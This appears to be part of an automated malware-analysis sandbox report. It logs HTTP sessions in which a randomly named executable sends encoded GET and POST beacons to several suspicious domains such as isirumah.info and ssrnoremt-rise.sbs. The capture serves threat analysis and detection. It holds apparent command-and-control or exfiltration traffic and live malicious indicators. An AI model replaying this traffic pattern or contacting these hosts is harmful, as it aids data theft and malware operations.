61 50 34 4e 56 53 70 66 63 36 4c 2f 34 [TRUNCATED]
                                                                                                      Data Ascii: 3Vh= [TRUNCATED]


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      24 | 192.168.2.5 | 50006 | 104.21.74.79 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Nov 18, 2024 13:55:26.498333931 CET | 484 | OUT | GET /qpp1/?GLvL=i6ILStp&3Vh=bNhe/DfYfogjOpkpwqpXjWD1WogAMITw7j9LK8VbiMrdvIszvqUx6yAB8LB2RXagyWSWfU/4R7sLqUv3mikd+VKtTD0iq8ysmv62W+FV5QchVtAtbmjy/m1Chp+ytcm09A== HTTP/1.1
                                                                                                      Host: www.tenmyk.shop
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Nov 18, 2024 13:55:28.069297075 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                      Date: Mon, 18 Nov 2024 12:55:28 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                      x-redirect-by: WordPress
                                                                                                      location: https://tenmyk.shop/qpp1/?GLvL=i6ILStp&3Vh=bNhe/DfYfogjOpkpwqpXjWD1WogAMITw7j9LK8VbiMrdvIszvqUx6yAB8LB2RXagyWSWfU/4R7sLqUv3mikd+VKtTD0iq8ysmv62W+FV5QchVtAtbmjy/m1Chp+ytcm09A==
                                                                                                      x-litespeed-cache-control: public,max-age=3600
                                                                                                      x-litespeed-tag: 3d9_HTTP.404,3d9_HTTP.301,3d9_404,3d9_URL.79a15f4fd7f632a198a3e44f6d3400cd,3d9_
                                                                                                      x-litespeed-cache: miss
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jnvR8SSPONKxgOTMnsMdswbnpz0xGqNC1R0umit9TGfCDTZFjL8jy%2F%2FHBkuX%2F%2ByuxTL6jf1%2B5XGzbUuazd7%2Fazyd21%2FpixQ72m7NeSoikMIzV9eFycesLKDPCFaiQqTuyPg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8e481d6a0c193ad0-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1318&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=484&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=00000000000000
                                                                                                      Data Raw:
                                                                                                      Data Ascii:
                                                                                                      Nov 18, 2024 13:55:28.069547892 CET | 20 | IN | Data Raw: 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0&ts=0&x=0"0


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      25 | 192.168.2.5 | 50007 | 15.197.204.56 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Nov 18, 2024 13:55:33.123099089 CET | 743 | OUT | POST /guxl/ HTTP/1.1
                                                                                                      Host: www.isirumah.info
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.isirumah.info
                                                                                                      Referer: http://www.isirumah.info/guxl/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 59 53 57 73 4c 44 4b 6e 7a 6c 48 4e 38 38 62 58 6a 42 4a 35 63 30 66 56 34 37 6c 34 38 79 2b 77 4b 61 30 77 6f 51 6a 42 50 63 47 6e 6e 58 41 56 30 6a 6d 44 45 42 70 43 36 4d 6e 7a 76 44 5a 64 77 39 41 56 5a 7a 39 2f 70 59 37 55 61 50 35 37 47 77 51 30 52 69 76 46 65 47 65 55 36 78 45 70 38 2b 68 78 74 6a 6b 39 47 79 74 6a 4e 59 35 6d 44 61 69 6c 4a 41 31 38 54 4f 7a 66 4e 78 48 73 72 69 46 73 43 64 70 77 62 47 6a 6f 63 46 51 6c 31 4d 4e 77 55 6b 74 39 37 33 59 4a 76 54 43 6d 61 69 54 33 35 72 66 63 55 35 63 2b 4c 74 2f 50 7a 38 48 57 4b 57 50 31 62 67 4e 7a 39 2f 4b 6e 75 56 43 4d 37 39 49 3d
                                                                                                      Data Ascii: 3Vh=YSWsLDKnzlHN88bXjBJ5c0fV47l48y+wKa0woQjBPcGnnXAV0jmDEBpC6MnzvDZdw9AVZz9/pY7UaP57GwQ0RivFeGeU6xEp8+hxtjk9GytjNY5mDailJA18TOzfNxHsriFsCdpwbGjocFQl1MNwUkt973YJvTCmaiT35rfcU5c+Lt/Pz8HWKWP1bgNz9/KnuVCM79I=


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      26 | 192.168.2.5 | 50008 | 15.197.204.56 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Nov 18, 2024 13:55:35.674618959 CET | 763 | OUT | POST /guxl/ HTTP/1.1
                                                                                                      Host: www.isirumah.info
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.isirumah.info
                                                                                                      Referer: http://www.isirumah.info/guxl/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 59 53 57 73 4c 44 4b 6e 7a 6c 48 4e 38 63 4c 58 68 69 52 35 49 6b 65 6e 33 62 6c 34 6d 43 2b 4b 4b 61 34 77 6f 56 62 52 50 76 79 6e 6b 33 77 56 33 68 43 44 49 68 70 43 78 73 6e 32 72 44 59 52 77 39 38 33 5a 32 64 2f 70 59 76 55 61 50 70 37 48 42 51 33 58 69 76 48 56 6d 65 57 77 52 45 70 38 2b 68 78 74 6a 77 45 47 78 64 6a 4e 73 46 6d 42 37 69 6d 4b 41 31 39 44 2b 7a 66 4a 78 48 53 72 69 46 4b 43 63 30 6c 62 45 62 6f 63 48 49 6c 31 64 4e 7a 62 6b 73 58 6d 6e 5a 6c 76 68 33 39 62 7a 44 4e 37 4b 36 6d 46 34 73 57 48 37 4f 6c 70 65 50 2b 5a 32 6a 4e 4c 7a 46 45 73 50 72 4f 30 32 53 38 6c 71 63 68 39 2f 61 76 35 67 79 32 6f 52 79 44 75 31 49 6f 73 65 5a 2b
                                                                                                      Data Ascii: 3Vh=YSWsLDKnzlHN8cLXhiR5Iken3bl4mC+KKa4woVbRPvynk3wV3hCDIhpCxsn2rDYRw983Z2d/pYvUaPp7HBQ3XivHVmeWwREp8+hxtjwEGxdjNsFmB7imKA19D+zfJxHSriFKCc0lbEbocHIl1dNzbksXmnZlvh39bzDN7K6mF4sWH7OlpeP+Z2jNLzFEsPrO02S8lqch9/av5gy2oRyDu1IoseZ+


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      27 | 192.168.2.5 | 50009 | 15.197.204.56 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Nov 18, 2024 13:55:38.222404003 CET | 1780 | OUT | POST /guxl/ HTTP/1.1
                                                                                                      Host: www.isirumah.info
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1240
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.isirumah.info
                                                                                                      Referer: http://www.isirumah.info/guxl/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 59 53 57 73 4c 44 4b 6e 7a 6c 48 4e 38 63 4c 58 68 69 52 35 49 6b 65 6e 33 62 6c 34 6d 43 2b 4b 4b 61 34 77 6f 56 62 52 50 76 71 6e 6e 47 51 56 33 42 2b 44 4c 68 70 43 38 4d 6e 33 72 44 5a 4c 77 39 6b 7a 5a 32 41 4b 70 62 58 55 62 73 78 37 57 44 34 33 43 53 76 48 61 47 65 58 36 78 46 78 38 2b 78 31 74 6a 67 45 47 78 64 6a 4e 71 68 6d 46 71 69 6d 47 67 31 38 54 4f 7a 70 4e 78 48 70 72 6d 6f 2f 43 63 77 31 62 56 37 6f 66 6e 59 6c 35 50 56 7a 45 55 73 56 31 58 5a 39 76 68 72 59 62 7a 65 32 37 4b 65 63 46 2f 59 57 45 37 43 35 75 71 66 37 64 32 7a 53 48 54 35 4a 30 35 44 70 32 47 4f 6f 6e 35 38 73 77 73 47 38 32 46 71 71 72 69 6a 33 33 41 30 4e 38 62 6b 4b 66 69 6a 38 68 59 44 6d 51 75 66 63 65 41 78 35 6d 39 34 4e 75 75 53 4a 36 39 4b 68 35 2f 71 69 6a 71 33 4a 61 75 78 7a 41 6f 39 2b 76 4f 44 32 79 4d 62 73 4a 7a 4e 77 46 52 44 37 35 61 30 69 64 47 4c 2b 32 43 70 5a 59 49 55 37 2b 43 65 51 47 43 74 5a 65 46 2b 39 4a 54 6a 61 53 56 62 79 71 35 4d 69 39 37 42 71 4a 69 6b 6a 33 63 64 67 2f 38 [TRUNCATED]
                                                                                                      Data Ascii: 3Vh=YSWsLDKnzlHN8cLXhiR5Iken3bl4mC+KKa4woVbRPvqnnGQV3B+DLhpC8Mn3rDZLw9kzZ2AKpbXUbsx7WD43CSvHaGeX6xFx8+x1tjgEGxdjNqhmFqimGg18TOzpNxHprmo/Ccw1bV7ofnYl5PVzEUsV1XZ9vhrYbze27KecF/YWE7C5uqf7d2zSHT5J05Dp2GOon58swsG82Fqqrij33A0N8bkKfij8hYDmQufceAx5m94NuuSJ69Kh5/qijq3JauxzAo9+vOD2yMbsJzNwFRD75a0idGL+2CpZYIU7+CeQGCtZeF+9JTjaSVbyq5Mi97BqJikj3cdg/8GJRKDxnyImMX9wAm7OehtgrQHftJwiZ4rqJJUrQURasEn5uJDtN7rtwTz2pwuDwSjEfv8+1l2tyjaBE9rxs7YXB0/mjiN2/LjZNGDaZz+a6MSDVi1poKZNCwzmU2o3r+KeLuSnPRSYzI11ecce/L1Uu/C/JacdExuf7me9Ax3nZQXKt8AtyIOMFs+i0Doi45s/ojqaP+iWRLicy5wMBikCWtIzuP0WrsOod83TC/BFkATRpVzsy6hdi7CWlEXr/5yIFFawd20n3rskUzJdVTVdzgunLb0IlgDS/rXGDv2f7OSn61nsIIZjYuiLfGsSbny/RYCLplhn8tvc0kEHmL2cHSAHGE18cdO94I24ypMMUZDcS2VCHa5ugYMt1V4T4uy927iynPglDHy7sfheDS/gxPcS9peSx+7GztcLTFm6kL4QwL7doFPpAVvNNQCl0eAqL66HNgrjwEaClm2hInHLF/QX6FZ0F0TJ+0VxSKprZJPuyD8FOyzB+tGcXXnib/pMTdjs+lJ/bCvBdkv7rgd+914p+KP+Bqq9Andunv9+vodGUcCj6JA6G8P1nev1pVDIhY/dWDDwz4mVb1fKcn4WycjWTLxVIjhEJWb6YrYZjrOZDVU+aMh0fV73OcpkdtwkN7fiYymbsddpNtYkQCCtTaHn6Nwh+A+8 [TRUNCATED]


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      28 | 192.168.2.5 | 50010 | 15.197.204.56 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Nov 18, 2024 13:55:40.764621019 CET | 486 | OUT | GET /guxl/?3Vh=VQ+MI0uxyUC67v7v1hceC1mX3dJlk0riHoAQ+3GvHNeFtXUu+z+ARRpD7cmGrTRyz64SdCAtvJHCLetkGUIMOH+WZ0Kd1BdS1tdCvwc6ShNqDahWH5yyFSR4U8rJOhuL/g==&GLvL=i6ILStp HTTP/1.1
                                                                                                      Host: www.isirumah.info
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Nov 18, 2024 13:55:41.384526014 CET | 404 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 18 Nov 2024 12:55:41 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 264
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 56 68 3d 56 51 2b 4d 49 30 75 78 79 55 43 36 37 76 37 76 31 68 63 65 43 31 6d 58 33 64 4a 6c 6b 30 72 69 48 6f 41 51 2b 33 47 76 48 4e 65 46 74 58 55 75 2b 7a 2b 41 52 52 70 44 37 63 6d 47 72 54 52 79 7a 36 34 53 64 43 41 74 76 4a 48 43 4c 65 74 6b 47 55 49 4d 4f 48 2b 57 5a 30 4b 64 31 42 64 53 31 74 64 43 76 77 63 36 53 68 4e 71 44 61 68 57 48 35 79 79 46 53 52 34 55 38 72 4a 4f 68 75 4c 2f 67 3d 3d 26 47 4c 76 4c 3d 69 36 49 4c 53 74 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3Vh=VQ+MI0uxyUC67v7v1hceC1mX3dJlk0riHoAQ+3GvHNeFtXUu+z+ARRpD7cmGrTRyz64SdCAtvJHCLetkGUIMOH+WZ0Kd1BdS1tdCvwc6ShNqDahWH5yyFSR4U8rJOhuL/g==&GLvL=i6ILStp"}</script></head></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      29 | 192.168.2.5 | 50011 | 188.114.97.3 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Nov 18, 2024 13:55:46.453429937 CET | 758 | OUT | POST /3jsc/ HTTP/1.1
                                                                                                      Host: www.ssrnoremt-rise.sbs
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.ssrnoremt-rise.sbs
                                                                                                      Referer: http://www.ssrnoremt-rise.sbs/3jsc/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 47 52 46 46 76 6c 70 48 35 6b 6f 4c 58 39 69 68 73 35 42 6c 4c 6f 53 34 72 59 34 75 67 33 57 54 64 61 2f 6c 6d 43 42 64 70 44 34 48 2b 70 6f 6f 6c 5a 74 2b 58 68 44 34 70 5a 4e 72 4c 7a 4f 68 38 4b 43 46 32 50 33 51 6b 34 73 76 43 6c 54 38 2f 50 69 31 48 76 4f 59 78 51 4e 61 72 2f 5a 6d 72 65 6c 48 79 4a 50 74 78 2f 32 76 50 32 6b 54 55 72 48 67 34 61 6a 63 30 4d 33 75 6f 36 68 79 38 57 34 55 71 57 41 50 73 6b 45 50 6b 5a 77 7a 43 76 41 4b 63 42 59 53 57 56 58 55 4f 79 6a 6e 61 67 43 2f 59 2f 37 69 68 65 62 50 4f 4e 70 55 61 46 55 35 57 57 74 5a 55 39 58 30 39 69 35 77 67 7a 69 4d 35 6c 63 3d
                                                                                                      Data Ascii: 3Vh=GRFFvlpH5koLX9ihs5BlLoS4rY4ug3WTda/lmCBdpD4H+poolZt+XhD4pZNrLzOh8KCF2P3Qk4svClT8/Pi1HvOYxQNar/ZmrelHyJPtx/2vP2kTUrHg4ajc0M3uo6hy8W4UqWAPskEPkZwzCvAKcBYSWVXUOyjnagC/Y/7ihebPONpUaFU5WWtZU9X09i5wgziM5lc=
                                                                                                      Nov 18, 2024 13:55:47.418620110 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 18 Nov 2024 12:55:47 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HMnA4r2nXw6WlQpK8dbcV7253z3POErnGIEdYdJaDKXSJuoUByxnIFKx12Ou4g8YKXaQDPpDjCNwNKRhZGtKREBoBxmlZZQ0cL6lvFs%2BVhof4OoW2Yj67GrvYgLeMDPBgKrHrQmS9hVk"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8e481de6986e6b2f-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1640&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 32 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae [TRUNCATED]
                                                                                                      Data Ascii: 2c8To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2ID`5
                                                                                                      Nov 18, 2024 13:55:47.418767929 CET | 342 | IN | Data Raw: ca 5c 50 08 77 ba c8 22 28 90 08 8d 6f 2b 9e 4a 95 87 e0 07 0e f8 20 ef 8f 5b f9 f1 a4 da ec e9 57 70 bf 96 19 89 70 dc d1 fe 5a 6c 4f e0 17 b8 a4 90 af 48 47 bd c1 b4 da ad e5 01 43 ba 0a 61 ec ea dc 29 64 b2 fe 2f 1a 3b 46 1e 16 52 7d dd dd db
                                                                                                      Data Ascii: \Pw"(o+J [WppZlOHGCa)d/;FR}dVfd]"fm%1 vbv+Y~ %cx0J]L$v i4Lm7ph%o$,Ak[[+


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      30 | 192.168.2.5 | 50012 | 188.114.97.3 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Nov 18, 2024 13:55:49.003150940 CET | 778 | OUT | POST /3jsc/ HTTP/1.1
                                                                                                      Host: www.ssrnoremt-rise.sbs
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.ssrnoremt-rise.sbs
                                                                                                      Referer: http://www.ssrnoremt-rise.sbs/3jsc/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 47 52 46 46 76 6c 70 48 35 6b 6f 4c 46 4e 79 68 2f 4f 74 6c 44 6f 53 37 6e 34 34 75 75 58 57 66 64 61 37 6c 6d 47 52 30 70 33 55 48 2b 4e 6b 6f 6b 64 35 2b 61 42 44 34 38 70 4e 75 46 54 4f 51 38 4b 4f 4e 32 50 4c 51 6b 34 34 76 43 6c 6a 38 2f 35 71 32 42 2f 4f 65 6b 41 4e 59 76 2f 5a 6d 72 65 6c 48 79 4e 76 54 78 2f 2b 76 50 46 38 54 4f 50 54 6a 77 36 6a 64 31 4d 33 75 2b 4b 68 32 38 57 34 36 71 54 38 70 73 6d 38 50 6b 64 67 7a 43 64 34 4a 48 78 59 51 59 31 57 6f 42 79 53 72 53 42 2b 4c 54 38 43 4c 38 2b 4c 6f 47 62 59 2b 41 6e 63 52 46 32 42 68 45 75 66 44 73 53 59 5a 36 51 79 38 6e 79 4a 70 43 35 44 6f 37 34 75 4e 6c 45 41 35 34 39 2b 38 78 52 62 37
                                                                                                      Data Ascii: 3Vh=GRFFvlpH5koLFNyh/OtlDoS7n44uuXWfda7lmGR0p3UH+Nkokd5+aBD48pNuFTOQ8KON2PLQk44vClj8/5q2B/OekANYv/ZmrelHyNvTx/+vPF8TOPTjw6jd1M3u+Kh28W46qT8psm8PkdgzCd4JHxYQY1WoBySrSB+LT8CL8+LoGbY+AncRF2BhEufDsSYZ6Qy8nyJpC5Do74uNlEA549+8xRb7
                                                                                                      Nov 18, 2024 13:55:49.915766954 CET | 1236 bytes | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 18 Nov 2024 12:55:49 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKdEhhiEIZicQifgDUOwgPYOTYRYZa8iEhqSlu6dC9zytsaFlLeQcYQx0KVvEkpAKydGZMUE%2B1JRbJNv%2ByP5kF4z5H7NiKjhTYaL7WTD2fNxQg90DrPq17jY0ucwnIjJYr5dieAfqL18"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8e481df6896f0072-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1510&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Nov 18, 2024 13:55:49.915952921 CET | 339 bytes | IN | (continuation of the gzip-compressed response body; raw bytes omitted)


                                                                                                      Session ID: 31 | Source IP: 192.168.2.5 | Source Port: 50013 | Destination IP: 188.114.97.3 | Destination Port: 80 | PID: 1896 | Process: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Nov 18, 2024 13:55:51.551079988 CET | 1795 bytes | OUT | POST /3jsc/ HTTP/1.1
                                                                                                      Host: www.ssrnoremt-rise.sbs
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1240
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.ssrnoremt-rise.sbs
                                                                                                      Referer: http://www.ssrnoremt-rise.sbs/3jsc/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Nov 18, 2024 13:55:52.522660971 CET | 1236 bytes | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 18 Nov 2024 12:55:52 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uD4l0%2FJdSKjgA%2FvD7RNAAK02qN%2BjGt5SAa2WE9QITWnuJYrefV44qJEUWTvKT187Z3MrtbLRLHjTg34RC2kMYc8mCcqn5x2yJCwcVIorbVq9TsgdCdF9N3wRdR3mBGG%2BBS%2FIRabrV0eh"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8e481e068dcb0b99-DFW
